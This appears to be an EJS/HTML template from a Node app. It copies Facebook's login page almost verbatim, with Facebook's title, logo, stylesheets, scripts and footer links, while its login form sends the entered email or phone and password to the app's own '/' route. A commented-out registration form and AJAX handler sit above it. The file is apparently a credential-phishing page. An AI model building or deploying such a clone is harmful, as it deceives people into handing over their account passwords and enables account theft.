<!-- <%- include('partials/header') %>
<div class="container mt-5">
  <h1>Register</h1>

  <div class="row">
    <div class="col-sm-8">
      <div class="card">
        <div class="card-body">

          Makes POST request to /register route
          <form action="/register" method="POST">
            <div class="form-group">
              <label for="email">Email</label>
              <input type="email" class="form-control" name="username">
            </div>
            <div class="form-group">
              <label for="password">Password</label>
              <input type="password" class="form-control" name="password">
            </div>
            <button type="submit" class="btn btn-dark">Register</button>
          </form>

        </div>
      </div>
    </div>

    <!-- <div class="col-sm-4">
      <div class="card social-block">
        <div class="card-body">
          <a class="btn btn-block" href="/auth/google" role="button">
            <i class="fab fa-google"></i>
            Sign Up with Google
          </a>
        </div>
      </div>
    </div> -->

  <!-- </div>
</div>

<%- include('partials/header') %> -->


<!DOCTYPE html>
<html lang="en" id="facebook" class="tinyViewport tinyWidth">
    <head>
<meta charset="utf-8">
<meta name="referrer" content="origin-when-crossorigin" id="meta_referrer"><script nonce="">window._cstart=+new Date();</script><script nonce="">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXglPbMnXLM4OmIU__4","timeslice_heartbeat_config":{"pollIntervalMs":33,"idleGapThresholdMs":60,"ignoredTimesliceNames":{"requestAnimationFrame":true,"Event listenHandler mousemove":true,"Event listenHandler mouseover":true,"Event listenHandler mouseout":true,"Event listenHandler scroll":true},"isHeartbeatEnabled":true,"isArtilleryOn":false},"shouldLogCounters":true,"timeslice_categories":{"react_render":true,"reflow":true},"sample_continuation_stacktraces":true,"dom_mutation_flag":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ7_d7GEgrh1L_Jd8MQ","isCQuick":false});</script><style nonce=""></style><script nonce="">__DEV__=0;CavalryLogger=window.CavalryLogger||function(a){this.lid=a,this.transition=!1,this.metric_collected=!1,this.is_detailed_profiler=!1,this.instrumentation_started=!1,this.pagelet_metrics={},this.events={},this.ongoing_watch={},this.values={t_cstart:window._cstart},this.piggy_values={},this.bootloader_metrics={},this.resource_to_pagelet_mapping={},this.initializeInstrumentation&&this.initializeInstrumentation()},CavalryLogger.prototype.setIsDetailedProfiler=function(a){this.is_detailed_profiler=a;return this},CavalryLogger.prototype.setTTIEvent=function(a){this.tti_event=a;return this},CavalryLogger.prototype.setValue=function(a,b,c,d){d=d?this.piggy_values:this.values;(typeof d[a]==="undefined"||c)&&(d[a]=b);return this},CavalryLogger.prototype.getLastTtiValue=function(){return this.lastTtiValue},CavalryLogger.prototype.setTimeStamp=CavalryLogger.prototype.setTimeStamp||function(a,b,c,d){this.mark(a);var e=this.values.t_cstart||this.values.t_start;e=d?e+d:CavalryLogger.now();this.setValue(a,e,b,c);this.tti_event&&a==this.tti_event&&(this.lastTtiValue=e,this.setTimeStamp("t_tti",b));return this},CavalryLogger.prototype.mark=typeof console==="object"&&console.timeStamp?function(a){console.timeStamp(a)}:function(){},CavalryLogger.prototype.addPiggyback=function(a,b){this.piggy_values[a]=b;return this},CavalryLogger.instances={},CavalryLogger.id=0,CavalryLogger.getInstance=function(a){typeof a==="undefined"&&(a=CavalryLogger.id);CavalryLogger.instances[a]||(CavalryLogger.instances[a]=new CavalryLogger(a));return CavalryLogger.instances[a]},CavalryLogger.setPageID=function(a){if(CavalryLogger.id===0){var b=CavalryLogger.getInstance();CavalryLogger.instances[a]=b;CavalryLogger.instances[a].lid=a;delete CavalryLogger.instances[0]}CavalryLogger.id=a},CavalryLogger.now=function(){return window.performance&&performance.timing&&performance.timing.navigationStart&&performance.now?performance.now()+performance.timing.navigationStart:new Date().getTime()},CavalryLogger.prototype.measureResources=function(){},CavalryLogger.prototype.profileEarlyResources=function(){},CavalryLogger.getBootloaderMetricsFromAllLoggers=function(){},CavalryLogger.start_js=function(){},CavalryLogger.done_js=function(){};CavalryLogger.getInstance().setTTIEvent("t_domcontent");CavalryLogger.prototype.measureResources=function(a,b){if(!this.log_resources)return;var c="bootload/"+a.name;if(this.bootloader_metrics[c]!==void 0||this.ongoing_watch[c]!==void 0)return;var d=CavalryLogger.now();this.ongoing_watch[c]=d;"start_"+c in this.bootloader_metrics||(this.bootloader_metrics["start_"+c]=d);b&&!("tag_"+c in this.bootloader_metrics)&&(this.bootloader_metrics["tag_"+c]=b);if(a.type==="js"){c="js_exec/"+a.name;this.ongoing_watch[c]=d}},CavalryLogger.prototype.stopWatch=function(a){if(this.ongoing_watch[a]){var b=CavalryLogger.now(),c=b-this.ongoing_watch[a];this.bootloader_metrics[a]=c;var d=this.piggy_values;a.indexOf("bootload")===0&&(d.t_resource_download||(d.t_resource_download=0),d.resources_downloaded||(d.resources_downloaded=0),d.t_resource_download+=c,d.resources_downloaded+=1,d["tag_"+a]=="_EF_"&&(d.t_pagelet_cssload_early_resources=b));delete this.ongoing_watch[a]}return this},CavalryLogger.getBootloaderMetricsFromAllLoggers=function(){var a={};Object.values(window.CavalryLogger.instances).forEach(function(b){b.bootloader_metrics&&Object.assign(a,b.bootloader_metrics)});return a},CavalryLogger.start_js=function(a){for(var b=0;b<a.length;++b)CavalryLogger.getInstance().stopWatch("js_exec/"+a[b])},CavalryLogger.done_js=function(a){for(var b=0;b<a.length;++b)CavalryLogger.getInstance().stopWatch("bootload/"+a[b])},CavalryLogger.prototype.profileEarlyResources=function(a){for(var b=0;b<a.length;b++)this.measureResources({name:a[b][0],type:a[b][1]?"js":""},"_EF_")};CavalryLogger.getInstance().log_resources=true;CavalryLogger.getInstance().setIsDetailedProfiler(true);window.CavalryLogger&&CavalryLogger.getInstance().setTimeStamp("t_start");</script><noscript><meta http-equiv="refresh" content="0; URL=/?_fb_noscript=1" /></noscript><link rel="manifest" href="/data/manifest/" crossorigin="use-credentials"><title id="pageTitle">Facebook – log in or sign up</title><meta property="og:site_name" content="Facebook"><meta property="og:url" content="https://www.facebook.com/"><meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png"><meta property="og:locale" content="en_GB"><script type="application/ld+json" nonce="">{"\u0040context":"http:\/\/schema.org","\u0040type":"WebSite","name":"Facebook","url":"https:\/\/www.facebook.com\/"}</script><link rel="search" type="application/opensearchdescription+xml" href="/osd.xml" title="Facebook"><link rel="canonical" href="https://www.facebook.com/"><link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.facebook.com/?locale2=en_GB"><link rel="alternate" media="handheld" href="https://m.facebook.com/?locale2=en_GB"><link rel="alternate" hreflang="x-default" href="https://www.facebook.com/"><link rel="alternate" hreflang="en" href="https://www.facebook.com/"><link rel="alternate" hreflang="ar" href="https://ar-ar.facebook.com/"><link rel="alternate" hreflang="bg" href="https://bg-bg.facebook.com/"><link rel="alternate" hreflang="bs" href="https://bs-ba.facebook.com/"><link rel="alternate" hreflang="ca" href="https://ca-es.facebook.com/"><link rel="alternate" hreflang="da" href="https://da-dk.facebook.com/"><link rel="alternate" hreflang="el" href="https://el-gr.facebook.com/"><link rel="alternate" hreflang="es" href="https://es-la.facebook.com/"><link rel="alternate" hreflang="es-es" href="https://es-es.facebook.com/"><link rel="alternate" hreflang="fa" href="https://fa-ir.facebook.com/"><link rel="alternate" hreflang="fi" href="https://fi-fi.facebook.com/"><link rel="alternate" hreflang="fr" href="https://fr-fr.facebook.com/"><link rel="alternate" hreflang="fr-ca" href="https://fr-ca.facebook.com/"><link rel="alternate" hreflang="hi" href="https://hi-in.facebook.com/"><link rel="alternate" hreflang="hr" href="https://hr-hr.facebook.com/"><link rel="alternate" hreflang="id" href="https://id-id.facebook.com/"><link rel="alternate" hreflang="it" href="https://it-it.facebook.com/"><link rel="alternate" hreflang="ko" href="https://ko-kr.facebook.com/"><link rel="alternate" hreflang="mk" href="https://mk-mk.facebook.com/"><link rel="alternate" hreflang="ms" href="https://ms-my.facebook.com/"><link rel="alternate" hreflang="pl" href="https://pl-pl.facebook.com/"><link rel="alternate" hreflang="pt" href="https://pt-br.facebook.com/"><link rel="alternate" hreflang="pt-pt" href="https://pt-pt.facebook.com/"><link rel="alternate" hreflang="ro" href="https://ro-ro.facebook.com/"><link rel="alternate" hreflang="sl" href="https://sl-si.facebook.com/"><link rel="alternate" hreflang="sr" href="https://sr-rs.facebook.com/"><link rel="alternate" hreflang="th" href="https://th-th.facebook.com/"><link rel="alternate" hreflang="vi" href="https://vi-vn.facebook.com/"><meta name="description" content="Create an account or log in to Facebook. Connect with friends, family and other people you know. Share photos and videos, send messages and get updates."><meta name="robots" content="noodp,noydir"><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yo/r/iRmz9lCMBD2.ico"><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yA/l/0,cross/elh3ERaIZ4q.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="s+PvD" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/2uODDt_1zdI.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="xSkeG" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yC/l/0,cross/WA9FIvtlwf-.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="CAbIm" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/bQ6eXSv-PN_.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="TvjvJ" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yF/l/0,cross/Q3ICo3dK63n.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="IpLkB" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yQ/l/0,cross/4SWMkzyuWef.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="KXBez" data-nonblocking="1" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/n92QSLV0XJz.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="iOXD2" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y6/l/0,cross/iWbQtMrJW8n.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="4l/Jz" crossorigin="anonymous"> 
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
	</script>
	<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js">
	</script>

<!-- 
	<script type="text/javascript">
		$(document).ready(function(){

			$( "#form1" ).submit(function(event) {
				event.preventDefault();

				$.ajax({
					type: 'POST',
					url: '/',
					data: $('#form1').serialize(),
					dataType: "json",
					success: function(response){
						//alert("a");
						//console.log(response.Success);
						$('#form1')[0].reset();

						document.getElementById("check").innerHTML=response.Success;
         					//ADD THIS CODE
         					setTimeout(function(){
         						document.getElementById("check").innerHTML="";
         					},3000);
         					if (response.Success=="You are regestered,You can login now.") {
         						document.getElementById("aa").click();
         					};
         				},
         				error: function() {
         				}
         			})
			});
		});
	</script> -->
</head>
<body>
	<!-- <div class="col-md-4 col-md-offset-4">

		<div>
			<p>Register Now
			</p> 
		</div>
		<div class="form-group">
			<form id="form1" method="post">
				<input type="email" name="email" placeholder="E-mail" required="" class="form-control"><br/>
				<input type="text" name="username" placeholder="Username" required="" class="form-control"><br/>
				<input type="password" name="password" placeholder="Password" required="" class="form-control"><br/>
				<input type="password" name="passwordConf" placeholder="Confirm Password" required="" class="form-control"><br/>
				<input type="submit" value="Register" class="btn btn-success">
			</form>
		</div>
			<div class="mssg bg-danger">
			<span id="check"></span>
		</div>
		<div>
			<span>Already Registered! <a href="/login">Login</a></span>
		</div>
		<div id="LangTable"><a href="/login" id="aa"></a>
		</div>
	</div> -->

	<div id="globalContainer" class="uiContextualLayerParent">
		<div class="fb_content clearfix " id="content" role="main">
			<div>
				<div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka">
					<div class="_8esk">
						<div class="_8esl">
							<div class="_8ice">
								<img class="fb_logo _8ilh img" src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Facebook">
							   </div>
							   <h2 class="_8eso">Facebook helps you connect and share with the people in your life.</h2>
						   </div><div class="_8esn">
							   <div class="_8iep _8icy _9ahz _9ah-">
								   <div class="_6luv _52jv">
   
   
   <form id="form1" action="/" method="POST" >
   
   <div>
   <div class="_6lux">
   <input type="text" class="inputtext _55r1 _6luy" name="username" id="email" data-testid="royal_email" placeholder="Email address or phone number" autofocus="1" aria-label="Email address or phone number">
   </div>
   <div class="_6lux">
   <div class="_6luy _55r1 _1kbt _9nyi" id="passContainer" style="border: none;">
<input type="password" class="inputtext _55r1 _6luy _9npi" name="password" id="pass"placeholder="Password" aria-label="Password"  style="border: none;">
   </div>
	</div> 
   <div class="_9ls7" id="u_0_b">
   <a href="#" role="button">
   <div class="_9luh">
   <div class="_9lsb _9ls8" id="u_0_c">
   </div>
	</div>
   </a>
   </div>
   </div>
     <div class="_6ltg">
   
   <button type="submit"  class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" >Log In</button>
	</div>
   <div class="_6ltj">
   <a href="">Forgotten password?</a>
	</div>
   <div class="_8icz">
   
   </div>
   <div class="_6ltg">
   <a role="button" class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy" href="#" ajaxify="/reg/spotlight/" id="u_0_2" data-testid="open-registration-form-button" rel="async">Create New Account</a>
   </div>
   
   </form>
   
   
   </div>
   
   <div id="reg_pages_msg" class="_58mk">
   <a href="/pages/create/?ref_type=registration_form" class="_8esh">Create a Page</a> for a celebrity, band or business.</div>
   
   </div></div></div></div></div></div>
   <div class="">
	   <div class="_8opy" 
	   ><div class="_95ke">
		   <div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
			   <div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i">
					   <li><a href="/r.php" title="Sign up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log in to Facebook">Log In</a></li>
					   <li><a href="https://messenger.com/" title="Take a look at Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos."> Watch </a></li>
					   <li><a href="/directory/people/" title="Browse our people directory.">People</a></li>
					   <li><a href="/directory/pages/" title="Browse our Pages directory.">Pages</a></li><li><a href="/pages/category/">Page categories</a></li>
					   <li><a href="/places/" title="Take a look at popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/directory/places/" title="Browse our places directory.">Locations</a></li>
					   <li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" target="_blank" title="Learn more about Facebook Pay">Facebook Pay</a></li>
					   <li><a href="/directory/groups/" title="Browse our Groups directory.">Groups</a></li><li><a href="/jobs/" title="Apply for jobs and hire on Facebook.">Jobs</a></li><li><a href="https://www.oculus.com/" target="_blank" title="Learn more about Oculus">Oculus</a></li>
					   <li><a href="https://portal.facebook.com/" target="_blank" title="Learn more about Portal from Facebook">Portal</a></li>
					   <li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT2J2ZTh4-FSDsMcSIsxhwozMQ-yRhA9x2lzYirYB6ZgrVU9GNDmOnm0PReQ7MxplyhR2S5zxJikYNfmggJGxCvA_TY3YHf-yWZrJUmAmmA93maITrijePQiGVQMEE8XSVucmPcWsHgRhiOy7WAliRWQ4I29-BkR0LMNpXEsYHgUi7AJA7U" title="Take a look at Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="async">Instagram</a></li>
					   <li><a href="/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li>
					   <li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li>
					   <li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li>
					   <li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Centre">Voting Information Centre</a></li>
					   <li><a href="/facebook" accesskey="8" title="Read our blog, discover the resource centre and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook">Create ad</a></li>
					   <li><a href="/pages/create/?ref_type=site_footer" title="Create a Page">Create Page</a></li>
					   <li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li>
					   <li><a href="/careers/?ref=pf" title="Make your next career move to our brilliant company.">Careers</a></li>
					   <li><a data-nocookies="1" href="/privacy/explanation" title="Learn about your privacy and Facebook.">Privacy</a></li>
					   <li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li>
					   <li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about AdChoices.">AdChoices<i class="img sp_5yTB9HoZ6ZG sx_cd8f67"></i></a></li><li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></li>
					   <li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Centre.">Help</a></li>
					   <li><a accesskey="6" class="accessible_elem" href="/settings" title="View and edit your Facebook settings.">Settings</a></li>
					   <li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="View your activity log">Activity log</a></li></ul></div><div class="mvl copyright"><div><span> Facebook © 2021</span>
   </div></div></div></div></div></div></div>
   
   


</body>
</html>